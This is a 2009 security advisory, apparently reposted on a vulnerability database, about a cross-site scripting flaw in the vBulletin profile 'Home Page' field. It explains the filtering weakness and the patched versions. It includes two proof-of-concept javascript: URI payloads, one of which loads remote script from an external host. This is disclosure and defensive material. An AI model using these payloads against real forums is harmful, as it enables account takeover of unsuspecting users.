vBulletin 3.8.4, 3.7.6, and 3.6.12 cross site scripting

2009.10.13
Credit: null
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

vBulletin - Cross Site Script Redirection Versions Affected: 3.8.4 / 3.7.6 / 3.6.12 Patches Available: 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1 Info: An XSS flaw within the user profile page has recently been discovered. This could allow an attacker to carry out an action as a user or obtain access to a user's account. To resolve this issue, it has been necessary to release a patch level version of the active versions of vBulletin. The upgrade process is the same as previous patch level releases - simply download the patch from the Members Area, extract the files and upload to your webserver, overwriting the existing files. There is no upgrade script required. As with all security-based releases, we recommend that all customers upgrade as soon as possible in order to prevent any potential damage resulting from the flaw being exploited. Credits: The original finder of the security hole. (Jelsoft?) Researched & Disclosed by: MaXe (InterN0T.net) Official Information: http://www.vbulletin.com/forum/showthread.php?t=319572 -:: The Advisory ::- The "Home Page" field in the user profile was only checking the user input for either "www" or the following regular expression written in normal text: Any letter from A to Z and/or a number from 0-9 + :// will make the link valid. The output in the Home Page field is encoded with most likely htmlspecialchars(), however before the patch it did not check if a user would create a link that would send an unknowing user to either the data: or javascript URI scheme. The only limits in the Home Page field are: - 90 character limit - Characters will be converted to html entities. - We can only use the data or javascript URI scheme. This means that we should avoid " since that becomes &quot; .. The other characters like < will become &lt; which is %3C which is almost the same. Please see how htmlentities() and htmlspecialchars() works in PHP. The following scheme input as home page will alert 0: javascript://%0adocument.write('<script>alert(0)</script>') The following scheme is a Proof of Concept that external Javascript can be loaded: javascript://%0adocument.write('<script src=http://intern0t.net/.k></script>') The following URL contains a working Proof of Concept on the Contact Page: http://forum.intern0t.net/members/maxe.html (will be removed soon) -:: Solution ::- Update to the newest version of vBulletin - 3.8.4PL1 / 3.7.6PL1 / 3.6.12PL1 -:: Conclusion ::- vBulletin is generally a safe and secure platform to use for large forums. This security hole / exploit is implausible to actually work against people. Please see: http://forum.intern0t.net/blogs/maxe/62-having-fun-cross-site-scripting.html for in-depth information. Disclosure Information: - Unknown date of when the vendor found the security hole. - Vendor released patch on the 7th October 2009. - Security hole researched and disclosed on 8th October 2009. Disclosure Reference: http://forum.intern0t.net/exploits-vulnerabilities-pocs/1502-vbulletin-3-8-4-cross-site-script-redirection.html All of the best, MaXe - Founder of InterN0T


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top